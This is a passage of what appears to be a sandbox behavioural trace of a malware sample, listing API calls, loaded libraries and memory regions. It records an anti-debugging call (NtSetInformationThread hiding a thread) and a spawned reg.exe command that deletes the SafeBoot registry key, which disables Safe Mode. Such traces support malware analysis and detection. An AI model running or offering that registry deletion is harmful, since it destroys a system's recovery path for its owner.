lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x289)) [0134.248] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0134.249] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0134.249] GetCurrentThread () returned 0xfffffffe [0134.249] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0134.249] GetTickCount () returned 0x1d14de3 [0134.249] Sleep (dwMilliseconds=0x3e8) Thread: id = 5 os_tid = 0xf6c [0085.256] GetCurrentThreadId () returned 0xf6c [0085.290] SysReAllocStringLen (in: pbstr=0x3edf548*=0x0, psz="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", len=0x28 | out: pbstr=0x3edf548*="API-MS-Win-Core-LocalRegistry-L1-1-0.dll") returned 1 [0085.291] CharLowerBuffW (in: lpsz="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-core-localregistry-l1-1-0.dll") returned 0x28 [0085.291] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x75a80000 [0085.291] GetLastError () returned 0x0 [0085.291] SetLastError (dwErrCode=0x0) [0085.296] GetProcAddress (hModule=0x75a80000, lpProcName="RegQueryValueExW") returned 0x75a91efe [0085.368] FreeLibrary (hLibModule=0x75cc0000) returned 1 Thread: id = 6 os_tid = 0xf78 [0085.364] GetCurrentThreadId () returned 0xf78 Thread: id = 7 os_tid = 0xf84 [0085.856] GetCurrentThreadId () returned 0xf84 [0085.856] WrapperThreadProc () [0085.907] GetProcAddress (hModule=0x76c60000, lpProcName="OleInitialize") returned 0x76c7efd7 [0085.908] GetProcAddress (hModule=0x76c60000, lpProcName="CoTaskMemFree") returned 0x76cb6f41 [0086.111] SysReAllocStringLen (in: pbstr=0x42de6ec*=0x0, psz="advapi32.dll", len=0xc | out: pbstr=0x42de6ec*="advapi32.dll") returned 1 [0086.111] CharLowerBuffW (in: lpsz="advapi32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0086.112] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x76f40000 [0086.191] GetProcAddress (hModule=0x76f40000, lpProcName="EventWrite") returned 0x77ac0c59 [0086.192] GetProcAddress (hModule=0x76f40000, lpProcName="EventRegister") returned 0x77a9f6ba [0086.192] GetProcAddress (hModule=0x76f40000, lpProcName="EventUnregister") returned 0x77ab9241 [0086.193] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ntdll.dll", cbMultiByte=9, lpWideCharStr=0x42dd624, cchWideChar=2047 | out: lpWideCharStr="ntdll.dll珸က") returned 9 [0086.193] SysReAllocStringLen (in: pbstr=0x42de628*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x42de628*="ntdll.dll") returned 1 [0086.193] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0086.193] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77a60000 [0086.194] GetLastError () returned 0x0 [0086.194] SetLastError (dwErrCode=0x0) [0086.194] GetProcAddress (hModule=0x77a60000, lpProcName="RtlUnhandledExceptionFilter") returned 0x77b28dd3 [0086.195] GetProcAddress (hModule=0x77a60000, lpProcName="RtlIsThreadWithinLoaderCallout") returned 0x77aa241f [0086.197] SysReAllocStringLen (in: pbstr=0x42de6f8*=0x0, psz="advapi32.dll", len=0xc | out: pbstr=0x42de6f8*="advapi32.dll") returned 1 [0086.198] CharLowerBuffW (in: lpsz="advapi32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0086.198] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x76f40000 [0086.198] GetProcAddress (hModule=0x76f40000, lpProcName="EventWrite") returned 0x77ac0c59 [0086.199] GetProcAddress (hModule=0x76f40000, lpProcName="EventRegister") returned 0x77a9f6ba [0086.199] GetProcAddress (hModule=0x76f40000, lpProcName="EventUnregister") returned 0x77ab9241 [0086.379] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ole32.dll", cbMultiByte=9, lpWideCharStr=0x42dec74, cchWideChar=2047 | out: lpWideCharStr="ole32.dllå\x10\x10ꟴ盈") returned 9 [0086.379] SysReAllocStringLen (in: pbstr=0x42dfc78*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x42dfc78*="ole32.dll") returned 1 [0086.379] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0086.380] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76c60000 [0086.380] GetLastError () returned 0x0 [0086.380] SetLastError (dwErrCode=0x0) [0086.381] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstance") returned 0x76ca9d0b [0086.539] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="API-MS-Win-Security-LSALookup-L1-1-0.dll", cbMultiByte=40, lpWideCharStr=0x42ddc90, cchWideChar=2047 | out: lpWideCharStr="API-MS-Win-Security-LSALookup-L1-1-0.dllЭ\x12\x14遜疩à珸\ⷝ怄ⷝ栄ⷞ뀄ⷞ射砀㄀㠀∀) returned 40 [0086.540] SysReAllocStringLen (in: pbstr=0x42dec94*=0x0, psz="API-MS-Win-Security-LSALookup-L1-1-0.dll", len=0x28 | out: pbstr=0x42dec94*="API-MS-Win-Security-LSALookup-L1-1-0.dll") returned 1 [0086.540] CharLowerBuffW (in: lpsz="API-MS-Win-Security-LSALookup-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-security-lsalookup-l1-1-0.dll") returned 0x28 [0086.540] LoadLibraryExA (lpLibFileName="API-MS-Win-Security-LSALookup-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x75960000 [0086.540] GetLastError () returned 0x0 [0086.540] SetLastError (dwErrCode=0x0) [0086.541] GetProcAddress (hModule=0x75960000, lpProcName="LookupAccountSidLocalW") returned 0x759705da [0086.576] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ADVAPI32.dll", cbMultiByte=12, lpWideCharStr=0x42dd8c0, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll飐æd") returned 12 [0086.576] SysReAllocStringLen (in: pbstr=0x42de8c4*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x42de8c4*="ADVAPI32.dll") returned 1 [0086.576] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0086.577] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76f40000 [0086.577] GetLastError () returned 0x0 [0086.577] SetLastError (dwErrCode=0x0) [0086.577] GetProcAddress (hModule=0x76f40000, lpProcName="OpenThreadToken") returned 0x76f5432c [0086.578] GetProcAddress (hModule=0x76f40000, lpProcName="OpenProcessToken") returned 0x76f54304 [0086.578] GetProcAddress (hModule=0x76f40000, lpProcName="GetTokenInformation") returned 0x76f5431c [0086.579] GetProcAddress (hModule=0x76f40000, lpProcName="AllocateAndInitializeSid") returned 0x76f540e6 [0086.579] GetProcAddress (hModule=0x76f40000, lpProcName="EqualSid") returned 0x76f5410b [0086.580] GetProcAddress (hModule=0x76f40000, lpProcName="FreeSid") returned 0x76f5412e [0086.582] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="CRYPTBASE.dll", cbMultiByte=13, lpWideCharStr=0x42ddbb4, cchWideChar=2047 | out: lpWideCharStr="CRYPTBASE.dll") returned 13 [0086.588] SysReAllocStringLen (in: pbstr=0x42debb8*=0x0, psz="CRYPTBASE.dll", len=0xd | out: pbstr=0x42debb8*="CRYPTBASE.dll") returned 1 [0086.588] CharLowerBuffW (in: lpsz="CRYPTBASE.dll", cchLength=0xd | out: lpsz="cryptbase.dll") returned 0xd [0086.588] LoadLibraryExA (lpLibFileName="CRYPTBASE.dll", hFile=0x0, dwFlags=0x0) returned 0x755a0000 [0086.589] GetLastError () returned 0x0 [0086.589] SetLastError (dwErrCode=0x0) [0086.589] GetProcAddress (hModule=0x755a0000, lpProcName="SystemFunction036") returned 0x755a12f0 [0086.617] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapIIDToProxyStubCLSID") returned 0x72ec192e [0086.618] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapIIDToTLBPath") returned 0x72ec1ac7 [0086.620] GetProcAddress (hModule=0x76f40000, lpProcName="RegEnumKeyW") returned 0x76f5445b [0086.621] GetProcAddress (hModule=0x76f40000, lpProcName="RegEnumKeyW") returned 0x76f5445b [0086.621] GetProcAddress (hModule=0x76f40000, lpProcName="RegEnumKeyW") returned 0x76f5445b [0086.829] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="PROPSYS.dll", cbMultiByte=11, lpWideCharStr=0x42dec6c, cchWideChar=2047 | out: lpWideCharStr="PROPSYS.dllЭ㎤åꜗ盈㎤åCLSID\\{00020420-0000-0000-C000-000000000046}") returned 11 [0086.830] SysReAllocStringLen (in: pbstr=0x42dfc70*=0x0, psz="PROPSYS.dll", len=0xb | out: pbstr=0x42dfc70*="PROPSYS.dll") returned 1 [0086.830] CharLowerBuffW (in: lpsz="PROPSYS.dll", cchLength=0xb | out: lpsz="propsys.dll") returned 0xb [0086.831] LoadLibraryExA (lpLibFileName="PROPSYS.dll", hFile=0x0, dwFlags=0x0) returned 0x738c0000 [0086.831] GetLastError () returned 0x0 [0086.831] SetLastError (dwErrCode=0x0) [0086.832] GetProcAddress (hModule=0x738c0000, lpProcName="InitVariantFromBuffer") returned 0x738c8a9e [0086.832] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="OLEAUT32", cbMultiByte=8, lpWideCharStr=0x42de7f8, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32") returned 8 [0086.832] SysReAllocStringLen (in: pbstr=0x42df7fc*=0x0, psz="OLEAUT32", len=0x8 | out: pbstr=0x42df7fc*="OLEAUT32") returned 1 [0086.832] CharLowerBuffW (in: lpsz="OLEAUT32", cchLength=0x8 | out: lpsz="oleaut32") returned 0x8 [0086.833] LoadLibraryA (lpLibFileName="OLEAUT32") returned 0x775d0000 [0086.833] GetLastError () returned 0x0 [0086.833] SetLastError (dwErrCode=0x0) [0088.707] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="OLEAUT32.dll", cbMultiByte=12, lpWideCharStr=0x42dec84, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.dll") returned 12 [0088.708] SysReAllocStringLen (in: pbstr=0x42dfc88*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x42dfc88*="OLEAUT32.dll") returned 1 [0088.708] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0088.708] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x775d0000 [0088.709] GetLastError () returned 0x0 [0088.709] SetLastError (dwErrCode=0x0) [0088.709] GetProcAddress (hModule=0x775d0000, lpProcName=0x9) returned 0x775d3eae [0088.748] GetProcAddress (hModule=0x76c60000, lpProcName="CoAllowSetForegroundWindow") returned 0x76c7b51e [0089.096] GetProcAddress (hModule=0x76c60000, lpProcName="OleUninitialize") returned 0x76c7eba1 [0089.235] GetCurrentThreadId () returned 0xf84 Thread: id = 8 os_tid = 0xf88 Thread: id = 9 os_tid = 0xf8c [0086.609] GetCurrentThreadId () returned 0xf8c Process: id = "2" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x42613000" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf34" cmd_line = "REG DELETE HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot /f" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 368 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 369 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 370 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 371 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 372 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 373 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 374 start_va = 0x1c0000 end_va = 0x211fff monitored = 1 entry_point = 0x1c1bca region_type = mapped_file name = "reg.exe" filename = "\\Windows\\SysWOW64\\reg.exe" (normalized: "c:\\windows\\syswow64\\reg.exe") Region: id = 375 start_va = 0x2d0000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 376 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 377 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 378 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 379 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 380 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 381 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 382 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 383 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 384 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 385 start_va = 0x310000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 386 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 387 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 388 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 389 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 390 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 391 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 392 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 393 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 394 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 395 start_va = 0x450000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 396 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 401 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 402 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 403 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 404 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 417 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 418 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 419 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 420 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 421 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 422 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 423 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 424 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 425 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 426 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 427 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 428 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 429 start_va = 0x76c00000 end_va = 0x76c34fff monitored = 0 entry_point = 0x76c0145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 430 start_va = 0x77a30000 end_va = 0x77a35fff monitored = 0 entry_point = 0x77a31782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 431 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 432 start_va = 0x610000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 433 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 434 start_va = 0x610000 end_va = 0x797fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 435 start_va = 0x7b0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 436 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 437 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 438 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 439 start_va = 0x7c0000 end_va = 0x940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 440 start_va = 0x950000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 441 start_va = 0x30000 end_va = 0x38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\reg.exe.mui") Region: id = 442 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 443 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 444 start_va = 0x1d50000 end_va = 0x201efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 4 os_tid = 0xf68 [0085.497] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fae4 | out: lpSystemTimeAsFileTime=0x30fae4*(dwLowDateTime=0xf10700e0, dwHighDateTime=0x1da9884)) [0085.497] GetCurrentProcessId () returned 0xf64 [0085.497] GetCurrentThreadId () returned 0xf68 [0085.497] GetTickCount () returned 0x1d03cca [0085.497] QueryPerformanceCounter (in: lpPerformanceCount=0x30fadc | out: lpPerformanceCount=0x30fadc*=3056632521709) returned 1 [0085.497] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0085.497] __set_app_type (_Type=0x1) [0085.497] __p__fmode () returned 0x76e631f4 [0085.498] __p__commode () returned 0x76e631fc [0085.498] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1cd4f9) returned 0x0 [0085.498] __wgetmainargs (in: _Argc=0x1cf030, _Argv=0x1cf038, _Env=0x1cf034, _DoWildCard=0, _StartInfo=0x1cf010 | out: _Argc=0x1cf030, _Argv=0x1cf038, _Env=0x1cf034) returned 0 [0085.499] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="DELETE", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0085.501] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="DELETE", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 3 [0085.501] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="DELETE", cchCount1=-1, lpString2="DELETE", cchCount2=-1) returned 2 [0085.502] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x30fa64 | out: phkResult=0x30fa64*=0x0) returned 0x2 [0085.502] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="DELETE", cchCount1=-1, lpString2="DELETE", cchCount2=-1) returned 2 [0085.502] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0085.502] GetProcessHeap () returned 0x510000 [0085.502] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f060 [0085.502] lstrlenW (lpString="") returned 0 [0085.502] GetProcessHeap () returned 0x510000 [0085.502] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x2) returned 0x523bb8 [0085.502] GetProcessHeap () returned 0x510000 [0085.502] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x523a18 [0085.502] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f078 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x523a38 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x523a58 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x523a78 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x523a98 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f090 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x524db8 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x524dd8 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x524df8 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x524e18 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f0a8 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x524e38 [0085.503] GetProcessHeap () returned 0x510000 [0085.503] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, 